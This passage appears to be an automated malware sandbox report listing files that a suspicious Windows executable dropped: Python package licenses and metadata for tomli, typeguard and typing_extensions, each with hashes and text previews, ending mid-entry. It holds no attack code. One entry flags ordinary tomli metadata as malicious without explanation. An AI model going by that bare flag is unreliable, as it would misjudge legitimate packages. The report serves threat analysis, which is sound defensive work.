                                                                                                                                                                                                                              Entropy (8bit):5.119723466133474
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:VrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:VaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                              MD5:EA4F5A41454746A9ED111E3D8723D17A
                                                                                                                                                                                                                              SHA1:F511A8A63AF8C6E36004B593478436BBC560EE0C
                                                                                                                                                                                                                              SHA-256:29E0FD62E929850E86EB28C3FDCCF0CEFDF4FA94879011CFFB3D0D4BED6D4DB6
                                                                                                                                                                                                                              SHA-512:CACA68A5589CA2EAB7C0D74BA5D2B25E3367B9902DFC7578BBA911AC8F8BF1C3A13F25E663C5B6B19BA71BF611943E23F4D0A99BE92A8F7D7FF60732DC3DD409
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2010-202x The platformdirs developers..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1072
                                                                                                                                                                                                                              Entropy (8bit):5.10135495500641
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:f9rmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:1aJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                              MD5:AAAAF0879D17DF0110D1AA8C8C9F46F5
                                                                                                                                                                                                                              SHA1:9DA6CA26337A886FB3E8D30EFD4AEDA623DC9ADE
                                                                                                                                                                                                                              SHA-256:B80816B0D530B8ACCB4C2211783790984A6E3B61922C2B5EE92F3372AB2742FE
                                                                                                                                                                                                                              SHA-512:EECD0C29FEBF51ADEFB02F970E66EFE7E24D573686DFDB3BEEA63CEFEA012A79CE3C49A899B4F26E9B67DC27176B397F6041909227281F9866BEEDC97389095C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2021 Taneli Hukkinen..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CON
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8875
                                                                                                                                                                                                                              Entropy (8bit):4.884349533695185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:h15VsahrDzoGlmLxUJyLIPXR/yrKK3Trclclg2pj4VRR6V8wNVonQd:3swrAamWuIPA2K3v2g
                                                                                                                                                                                                                              MD5:CBBF7047A51FEDA58386E86182B85B8A
                                                                                                                                                                                                                              SHA1:D3EA3BDA227794AE35FE7FFC5BD6E5FA2A5EF250
                                                                                                                                                                                                                              SHA-256:CCF0DC78A98FC0918B5AD67292B1E2C4BED65575A6246CD9D63C914F9942A0F2
                                                                                                                                                                                                                              SHA-512:A994914F1676790730C6BDACA26FE5F1B18BA9A3B9F0D24D708C722424DED255360A0CC88E239C6BFE467BD2763DF7339BB6B760AB090FAE474A7C9C8AFA8948
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: tomli.Version: 2.0.1.Summary: A lil' TOML parser.Keywords: toml.Author-email: Taneli Hukkinen <hukkin@users.noreply.github.com>.Requires-Python: >=3.7.Description-Content-Type: text/markdown.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: MacOS.Classifier: Operating System :: Microsoft :: Windows.Classifier: Operating System :: POSIX :: Linux.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Typing :: Typed.Project-URL: Changelog, https://github.com/hukkin/tomli/blob/master/CHANGELOG.md.Project-URL:
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):999
                                                                                                                                                                                                                              Entropy (8bit):5.89030761653127
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4n/2zDRv53Pb4EsJWc6QtD8r8N8bh8WNdop2+oM8+kzAL5+1:4nuXR1Pb45JWc6QmIebKWcpHoM8JMLy
                                                                                                                                                                                                                              MD5:D5FAB61E3DB6B54B51FBA607865C195B
                                                                                                                                                                                                                              SHA1:B94D9126E8FC9D5F29FAFBB67F068E2D111D17FC
                                                                                                                                                                                                                              SHA-256:0CB9F9A451A1E365AC54B4C88662E1DA0CB54A72D16A5258FB0ABFF9D3E1C022
                                                                                                                                                                                                                              SHA-512:ABD3EF61D8D578C1DE609560A6985503E60BD53F90DCFF54EBEE23714D9CD88DBA4036ED19B24EC62B8432550311894FCC47BDCCD7CE4DCDE82518F4E02E123C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:tomli-2.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..tomli-2.0.1.dist-info/LICENSE,sha256=uAgWsNUwuKzLTCIReDeQmEpuO2GSLCte6S8zcqsnQv4,1072..tomli-2.0.1.dist-info/METADATA,sha256=zPDceKmPwJGLWtZykrHixL7WVXWmJGzZ1jyRT5lCoPI,8875..tomli-2.0.1.dist-info/RECORD,,..tomli-2.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..tomli-2.0.1.dist-info/WHEEL,sha256=jPMR_Dzkc4X4icQtmz81lnNY_kAsfog7ry7qoRvYLXw,81..tomli/__init__.py,sha256=JhUwV66DB1g4Hvt1UQCVMdfCu-IgAV8FXmvDU9onxd4,396..tomli/__pycache__/__init__.cpython-312.pyc,,..tomli/__pycache__/_parser.cpython-312.pyc,,..tomli/__pycache__/_re.cpython-312.pyc,,..tomli/__pycache__/_types.cpython-312.pyc,,..tomli/_parser.py,sha256=g9-ENaALS-B8dokYpCuzUFalWlog7T-SIYMjLZSWrtM,22633..tomli/_re.py,sha256=dbjg5ChZT23Ka9z9DHOXfdtSpPwUfdgMXnj8NOoly-w,2943..tomli/_types.py,sha256=-GTG2VUqkpxwMqzmVO4F7ybKddIbAnuAHXfmWQcTi3Q,254..tomli/py.typed,sha256=8PjyZ1aVoQpRVvt71muvuq5qE-jTFZkK-GLHkhdebmc,26..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFMthP+tPCCfA5I:Rt1QqDWBB3
                                                                                                                                                                                                                              MD5:FF39892A240316BD62B5832C03D504BC
                                                                                                                                                                                                                              SHA1:3883FC4406CC9A73BE0B839C1A0C31D3DDD64829
                                                                                                                                                                                                                              SHA-256:8CF311FC3CE47385F889C42D9B3F35967358FE402C7E883BAF2EEAA11BD82D7C
                                                                                                                                                                                                                              SHA-512:B2E57D9C81BBFB7364B8216FC086B8F73C2F2B537E300FB250EFB7972E3908F77A3D504363676C50A195D307822C69EE9B689DE6C48A4E6B8A6BA89A5A99AC32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.6.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1130
                                                                                                                                                                                                                              Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                              MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                              SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                              SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                              SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3717
                                                                                                                                                                                                                              Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                              MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                              SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                              SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                              SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2402
                                                                                                                                                                                                                              Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                              MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                              SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                              SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                              SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                              Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                              MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                              SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                              SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                              SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                              Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:LEJn:M
                                                                                                                                                                                                                              MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                              SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                              SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                              SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13936
                                                                                                                                                                                                                              Entropy (8bit):5.135214154002924
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:cke8RQ6KSAdxC9ad9iqsibQtKti9zpQpzu9Jkh:K8RQ6q7C9ad9iqT8cti9zpQpzu7kh
                                                                                                                                                                                                                              MD5:FCF6B249C2641540219A727F35D8D2C2
                                                                                                                                                                                                                              SHA1:C6E195F9AA30CC9B675D1612CA4FB7F74111BD35
                                                                                                                                                                                                                              SHA-256:3B2F81FE21D181C499C59A256C8E1968455D6689D269AA85373BFB6AF41DA3BF
                                                                                                                                                                                                                              SHA-512:70367B908204B5922E5D9D2ACE39437DBAA1EEFDAD1797B50CC6E7DCA168D9B59199353BADDDCAEEE12B49D328FC8132F628952383CFE6803CB4F4BF9B9D6D86
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:A. HISTORY OF THE SOFTWARE.==========================..Python was created in the early 1990s by Guido van Rossum at Stichting.Mathematisch Centrum (CWI, see https://www.cwi.nl) in the Netherlands.as a successor of a language called ABC. Guido remains Python's.principal author, although it includes many contributions from others...In 1995, Guido continued his work on Python at the Corporation for.National Research Initiatives (CNRI, see https://www.cnri.reston.va.us).in Reston, Virginia where he released several versions of the.software...In May 2000, Guido and the Python core development team moved to.BeOpen.com to form the BeOpen PythonLabs team. In October of the same.year, the PythonLabs team moved to Digital Creations, which became.Zope Corporation. In 2001, the Python Software Foundation (PSF, see.https://www.python.org/psf/) was formed, a non-profit organization.created specifically to own Python-related Intellectual Property..Zope Corporation was a sponsoring member of the PS
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3018
                                                                                                                                                                                                                              Entropy (8bit):5.0579916471633
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DtkCMU2ymXbFX1QI/aMktjaVQEBu+FOK+W6i+qXd0qme28mIp9DvvV+Vz+nlh:DtkCD/mxX1QI/aMktjaVBroBBqd0VODD
                                                                                                                                                                                                                              MD5:8303191AC93E4D32457A4A9E3CDAD8E5
                                                                                                                                                                                                                              SHA1:B6ADA54B9516D20B69A5DD5CDED868DA22C5E252
                                                                                                                                                                                                                              SHA-256:05E51021AF1C9D86EB8D6C7E37C4CECE733D5065B91A6D8389C5690ED440F16D
                                                                                                                                                                                                                              SHA-512:F2F5DBE5EA55ED720FA4191180076E9EFFCB9C811C3C7BF1A1201E9D78590B381E125EAF7B8366B28A03383C2958449423548576605E8DCB5CC11C33C9B0E709
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: typing_extensions.Version: 4.12.2.Summary: Backported and Experimental Type Hints for Python 3.8+.Keywords: annotations,backport,checker,checking,function,hinting,hints,type,typechecking,typehinting,typehints,typing.Author-email: "Guido van Rossum, Jukka Lehtosalo, .ukasz Langa, Michael Lee" <levkivskyi@gmail.com>.Requires-Python: >=3.8.Description-Content-Type: text/markdown.Classifier: Development Status :: 5 - Production/Stable.Classifier: Environment :: Console.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Python Software Foundation License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Langua
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):571
                                                                                                                                                                                                                              Entropy (8bit):5.751670348693122
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:rCA89x0a/2zDuxv/vjWaxLbSaLjxjxXaefIE12BATqyo/C:mA87n/2zD6vXCulVZf5Cc4C
                                                                                                                                                                                                                              MD5:B884E8832BFB336C2D7F54271F11EE1C
                                                                                                                                                                                                                              SHA1:5A3BAABEE79E0CF32D2E87C9AF0FBB3AAD8CACAD
                                                                                                                                                                                                                              SHA-256:7710002D81971E632AA6A2FC33DC5D74AAF5D7CAAE22040A65D3E31503B05EE9
                                                                                                                                                                                                                              SHA-512:0A5EB3ABED212C474CB5FDDEF47F8E62DAA130128F2BB368A8E1F12E143DAE2F8B2EF4A9B85A883A03C67195829AD637DB7CF7CC4B41535AF6CA5668F8F2BD0B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:__pycache__/typing_extensions.cpython-312.pyc,,..typing_extensions-4.12.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typing_extensions-4.12.2.dist-info/LICENSE,sha256=Oy-B_iHRgcSZxZolbI4ZaEVdZonSaaqFNzv7avQdo78,13936..typing_extensions-4.12.2.dist-info/METADATA,sha256=BeUQIa8cnYbrjWx-N8TOznM9UGW5Gm2DicVpDtRA8W0,3018..typing_extensions-4.12.2.dist-info/RECORD,,..typing_extensions-4.12.2.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..typing_extensions.py,sha256=gwekpyG9DVG3lxWKX4ni8u7nk3We5slG98mA9F3DJQw,134451..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
